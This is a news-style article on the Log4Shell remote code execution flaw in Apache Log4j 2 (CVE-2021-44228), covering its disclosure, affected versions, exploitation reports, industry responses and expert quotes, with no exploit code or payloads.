Apache Log4j is a Java-based logging utility originally written by Ceki Gülcü. It is part of Apache Logging Services, a project of the Apache Software Foundation. The Apache Log4j team has created a successor to Log4j 1 with version number 2. Log4j 2 was developed with a focus on the problems of Log4j 1.2, 1.3,
java.util.logging and Logback, and addresses issues that appeared in those frameworks.
On December 9, 2021, a zero-day arbitrary code execution vulnerability in Log4j 2 was reported and given the descriptor “Log4Shell”. It has been characterized as “Most Critical Vulnerability of the last decade”
The Apache Software Foundation has issued patches to address a frequently exploited zero-day vulnerability in the Apache Log4j Java-based logging library, which could be used to execute malicious code and gain complete control of susceptible systems.
CVE-2021-44228, also known as Log4Shell or LogJam, is an instance of unauthenticated, remote code execution (RCE) on any application that uses the open-source software, and it affects Log4j 2.0-beta9 through 2.14.1. The bug received a perfect score of ten out of ten in the CVSS rating system, indicating the severity of the problem.
When message lookup substitution is enabled, an attacker with control over log messages or log message parameters can run arbitrary code loaded from LDAP servers, according to the Apache Foundation. “This behavior has been removed by default since Log4j 2.15.0.”
A single string of text can cause an application to contact a malicious external host if it is logged through the vulnerable instance of Log4j, essentially giving the adversary the ability to fetch a payload from a remote server and execute it locally. The flaw was discovered by Chen Zhaojun of Alibaba Cloud Security Team, according to the project maintainers.
Amazon, Apple iCloud, Cisco, Cloudflare, ElasticSearch, Red Hat, Steam, Tesla, Twitter, and video games like Minecraft use Log4j as a logging package in a range of various prominent technologies. Attackers have been able to achieve RCE on Minecraft servers by simply pasting a carefully designed message into the chat box in the case of the latter.
A huge attack surface
“The Apache Log4j zero-day vulnerability is probably the most critical vulnerability we have seen this year,” said Bharat Jogi, senior manager of vulnerabilities and signatures at Qualys. “Log4j is a ubiquitous library used by millions of Java applications for logging error messages. This vulnerability is trivial to exploit.”
Cybersecurity firms BitDefender, Cisco Talos, Huntress Labs, and Sonatype have all confirmed evidence of mass scanning of affected applications in the wild for vulnerable servers and attacks registered against their honeypot networks following the availability of a proof-of-concept (PoC) exploit. “This is a low-skilled attack that is extremely simple to execute,” Sonatype’s Ilkka Turunen said.
GreyNoise, likening the flaw to Shellshock, said it observed malicious activity targeting the vulnerability commencing on December 9, 2021. Web infrastructure company Cloudflare noted that it blocked roughly 20,000 exploit requests per minute around 6:00 p.m. UTC on Friday, with most of the exploitation attempts originating from Canada, the U.S., Netherlands, France, and the U.K.
Given the ease of exploitation and prevalence of Log4j in enterprise IT and DevOps, in-the-wild attacks aimed at susceptible servers are expected to ramp up in the coming days, making it imperative to address the flaw immediately. Israeli cybersecurity firm Cybereason has also released a fix called “Logout4Shell” that closes out the shortcoming by using the vulnerability itself to reconfigure the logger and prevent further exploitation of the attack.
“This Log4j (CVE-2021-44228) vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string,” Security expert Marcus Hutchins said in a tweet.